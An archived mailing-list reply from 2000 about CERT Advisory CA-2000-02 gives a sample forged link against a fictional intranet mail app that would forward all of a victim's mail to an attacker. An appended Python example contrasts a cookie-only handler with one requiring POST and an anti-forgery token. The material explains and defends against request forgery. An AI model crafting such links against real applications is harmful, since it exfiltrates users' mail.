Re: Fwd: CERT Advisory CA-2000-02

From: Cassius (sekurityat_private)
Date: Thu Feb 03 2000 - 14:11:36 PST


    Shockro,
    
    The danger is also in variables.  Pretend that I get you to click on this
    link from within your custom intranet mail app.
    
    http://intranet.example.com/mailbox.asp?action=forward&item=all&recipient=badguyat_private
    
    It would forward all of your mail to badguyat_private.  This would work
    because you already have a session with mailbox.asp.
    
    Of course mailbox.asp is fake but you get the idea.
    
    -Cassius
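The point made in this message, as an added example that is not part of the original post and not code from any real application: a handler that trusts the session cookie alone acts on the clicked link, while one that requires POST plus a per-session token rejects it. The handler names, session store and requests are constructed for illustration, and Python stands in for the hypothetical mailbox.asp.

```python
import hmac
import secrets
from urllib.parse import urlsplit, parse_qs

# Constructed session store: session id -> user and per-session anti-forgery token.
SESSIONS = {"sess-1234": {"user": "shockro", "csrf_token": secrets.token_urlsafe(32)}}
COOKIES = {"sid": "sess-1234"}  # the browser attaches this to every request by itself
# Constructed link of the same shape as the one in the message.
LINK = ("http://intranet.example.com/mailbox.asp"
        "?action=forward&item=all&recipient=someone@example.org")

def handle_vulnerable(method, url, cookies, form=None):
    """Acts on the session cookie alone; any followed link can trigger the action."""
    if SESSIONS.get(cookies.get("sid")) is None:
        return 401, "no session"
    q = parse_qs(urlsplit(url).query)
    if q.get("action") == ["forward"]:
        return 200, "forwarding %s to %s" % (q.get("item", [""])[0],
                                             q.get("recipient", [""])[0])
    return 400, "unknown action"

def handle_hardened(method, url, cookies, form=None):
    """Same action, but only via POST carrying the token bound to this session."""
    session = SESSIONS.get(cookies.get("sid"))
    if session is None:
        return 401, "no session"
    if method != "POST":
        return 405, "state-changing actions require POST"
    form = form or {}
    supplied = form.get("csrf_token", "").encode()
    # Constant-time comparison; a page on another site cannot read this token.
    if not hmac.compare_digest(supplied, session["csrf_token"].encode()):
        return 403, "missing or wrong anti-forgery token"
    if form.get("action") == "forward":
        return 200, "forwarding %s to %s" % (form.get("item", ""),
                                             form.get("recipient", ""))
    return 400, "unknown action"

def demo():
    """Status codes: clicked link (old, new), forged POST, the app's own form."""
    forged = {"action": "forward", "item": "all", "recipient": "someone@example.org"}
    own = dict(forged, csrf_token=SESSIONS["sess-1234"]["csrf_token"])
    return (handle_vulnerable("GET", LINK, COOKIES)[0],
            handle_hardened("GET", LINK, COOKIES)[0],
            handle_hardened("POST", LINK, COOKIES, forged)[0],
            handle_hardened("POST", LINK, COOKIES, own)[0])

if __name__ == "__main__":
    print(demo())
```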
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 15:33:28 PDT